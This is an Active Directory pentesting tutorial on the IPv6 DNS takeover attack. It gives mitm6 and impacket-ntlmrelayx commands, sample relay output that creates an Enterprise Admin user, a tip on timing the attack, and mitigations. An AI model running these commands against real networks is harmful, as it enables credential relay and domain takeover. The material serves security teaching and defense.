Attacks - Active Directory Hacking

IPv6 Attack

TL;DR

IPv6 Attack exploits Windows’ preference for IPv6 over IPv4 and the default enabled state of IPv6 in Windows networks. Even if IPv6 is not used in the network, Windows will still attempt to use it, allowing attackers to perform man-in-the-middle attacks. We’ll use mitm6 tool to perform IPv6 DNS takeover attack:

sudo mitm6 -d lab.local

Then use ntlmrelayx to capture and relay authentication:

impacket-ntlmrelayx -6 -t ldaps://dc01.lab.local -wh fakewpad.lab.local -l lootme

What is IPv6 Attack?

IPv6 Attack exploits Windows’ preference for IPv6 over IPv4 and the default enabled state of IPv6 in Windows networks. Even if IPv6 is not used in the network, Windows will still attempt to use it, allowing attackers to perform man-in-the-middle attacks.

How it works?

  1. Windows networks have IPv6 enabled by default, even if not in use
  2. When a DNS request is made, Windows queries for both IPv4 and IPv6 addresses
  3. Attacker sets up a rogue IPv6 DNS server
  4. Windows prefers IPv6 over IPv4, so it uses the attacker’s DNS server
  5. Attacker can intercept traffic and perform man-in-the-middle attacks
  6. Authentication credentials can be captured during this process

Demo Time

We’ll use mitm6 tool to perform IPv6 DNS takeover attack:

sudo mitm6 -d lab.local

Then use ntlmrelayx to capture and relay authentication:

impacket-ntlmrelayx -6 -t ldaps://dc01.lab.local -wh fakewpad.lab.local -l lootme

When a user logs in or reboots their machine, you’ll see authentication attempts being captured and relayed.

If the administrator logs in, you’ll see something like this:

[*] User privileges found: Create user
[*] User privileges found: Adding user to a privileged group (Enterprise Admins)
[*] User privileges found: Modifying domain ACL
[*] adding new user with username: NgoqUace and password: &1kA386F%*! result: OK

Now we have a username and password with a privilege of Enterprise Admin!!!!

** Note: This attack is most effective during work hours when users are active, requiring only system restarts or network reconnections to succeed (an event to trigger). **

Mitigation

To protect against IPv6 Attacks:

  • Disable IPv6 if not in use
  • Disable WPAD if not in use via Group Policy and by disabling the WinHttpAutoProxySvc service
  • Use IPv6 firewall rules
  • Relaying to LDAP and LDAPS can only be mitigated by enabling LDAP signing and enabling LDAP channel binding.